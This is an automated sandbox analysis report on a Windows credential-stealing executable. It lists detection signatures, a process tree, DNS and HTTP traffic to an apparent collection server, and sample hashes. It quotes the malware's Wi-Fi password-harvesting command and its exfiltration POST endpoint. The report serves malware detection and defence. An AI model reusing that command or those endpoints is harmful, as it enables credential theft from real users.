Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wssvZm9dNK.exe

Overview

General Information

Sample name:wssvZm9dNK.exe
renamed because original name is a hash value
Original sample name:2c5697f085b66bec06e28ed6d24ec606.exe
Analysis ID:1461765
MD5:2c5697f085b66bec06e28ed6d24ec606
SHA1:a3910a0f75b328f996983847cfdcc5df85520e98
SHA256:432dc35a995a5ba33b1f3887b3cc7804fcc3d5d2b1d4aec2664acaf20cb11bad
Infos:

Detection

PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected PXRECVOWEIWOEI Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • wssvZm9dNK.exe (PID: 2036 cmdline: "C:\Users\user\Desktop\wssvZm9dNK.exe" MD5: 2C5697F085B66BEC06E28ED6D24EC606)
    • cmd.exe (PID: 2964 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: AD7B9C14083B52BC532FBA5948342B98)
      • chcp.com (PID: 2776 cmdline: chcp 65001 MD5: 4436B1A16BDC58D2B3A5263F042C09B3)
      • netsh.exe (PID: 2712 cmdline: netsh wlan show profile MD5: 784A50A6A09C25F011C3143DDD68E729)
      • findstr.exe (PID: 2120 cmdline: findstr All MD5: 18F02C555FBC9885DF9DB77754D6BB9B)
  • msiexec.exe (PID: 3040 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
    00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: wssvZm9dNK.exe PID: 2036JoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
        Process Memory Space: wssvZm9dNK.exe PID: 2036JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: wssvZm9dNK.exe PID: 2036JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Sigma Signatures

            Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\Desktop\wssvZm9dNK.exe, QueryName: icanhazip.com

            Stealing of Sensitive Information

            barindex
            Sigma detected: Capture Wi-Fi password
            Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wssvZm9dNK.exe", ParentImage: C:\Users\user\Desktop\wssvZm9dNK.exe, ParentProcessId: 2036, ParentProcessName: wssvZm9dNK.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 2964, ProcessName: cmd.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: wssvZm9dNK.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: wssvZm9dNK.exeReversingLabs: Detection: 52%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: wssvZm9dNK.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49167 version: TLS 1.2
            Source: wssvZm9dNK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638548738767882883Host: whatismyipaddressnow.coContent-Length: 5169Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: whatismyipaddressnow.co
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: whatismyipaddressnow.co
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: icanhazip.com
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: icanhazip.com
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: ip-api.com
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: whatismyipaddressnow.co
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: whatismyipaddressnow.co
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: whatismyipaddressnow.co
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeDNS query: name: whatismyipaddressnow.co
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: whatismyipaddressnow.co
            Source: global trafficDNS traffic detected: DNS query: icanhazip.com
            Source: global trafficDNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: unknownHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638548738767882883Host: whatismyipaddressnow.coContent-Length: 5169Connection: Keep-Alive
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wssvZm9dNK.exe, 00000000.00000002.401997905.000000000591F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddressnow.co
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: tmp52E1.tmp.dat.0.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/0-1508238359936
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/1-1508238359942
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/2-1508238359945
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/3-1508238359948
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/4-1508238359950
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdfw
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
            Source: tmpEEA8.tmp.dat.0.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/search?q=net
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=te
            Source: tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceidLR
            Source: tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/search?q=wmf
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003877000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007377000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.000000000340D000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000264C000.00000004.00000800.00020000.00000000.sdmp, tmp3E8D.tmp.dat.0.dr, tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/sorry/index
            Source: tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
            Source: tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003862000.00000004.00000800.00020000.00000000.sdmp, tmp3E8D.tmp.dat.0.dr, tmp8E34.tmp.dat.0.drString found in binary or memory: https://www.google.com/sorry/indextest
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003758000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/about/gro.allizom.www.
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003758000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/contribute/gro.allizom.www.
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003758000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/central/gro.allizom.www.
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003758000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/customize/gro.allizom.www.
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003758000.00000004.00000800.00020000.00000000.sdmp, tmp52E1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/help/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49167 version: TLS 1.2
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chcp.comMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: wssvZm9dNK.exe, 00000000.00000000.351853550.0000000000240000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename50lip51sm.exeB vs wssvZm9dNK.exe
            Source: wssvZm9dNK.exe, 00000000.00000002.400862104.00000000005D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs wssvZm9dNK.exe
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000035F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameR4tion4lism.exeB vs wssvZm9dNK.exe
            Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003410000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameR4tion4lism.exeB vs wssvZm9dNK.exe
            Source: wssvZm9dNK.exe, 00000000.00000002.401905465.0000000005540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameR4tion4lism.exeB vs wssvZm9dNK.exe
            Source: wssvZm9dNK.exeBinary or memory string: OriginalFilename50lip51sm.exeB vs wssvZm9dNK.exe
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/9@6/4
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMutant created: NULL
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMutant created: \Sessions\1\BaseNamedObjects\632922
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile created: C:\Users\user\AppData\Local\Temp\7xwghk55.defaultJump to behavior
            Source: wssvZm9dNK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: wssvZm9dNK.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: wssvZm9dNK.exeReversingLabs: Detection: 52%
            Source: unknownProcess created: C:\Users\user\Desktop\wssvZm9dNK.exe "C:\Users\user\Desktop\wssvZm9dNK.exe"
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: wbemcomn2.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
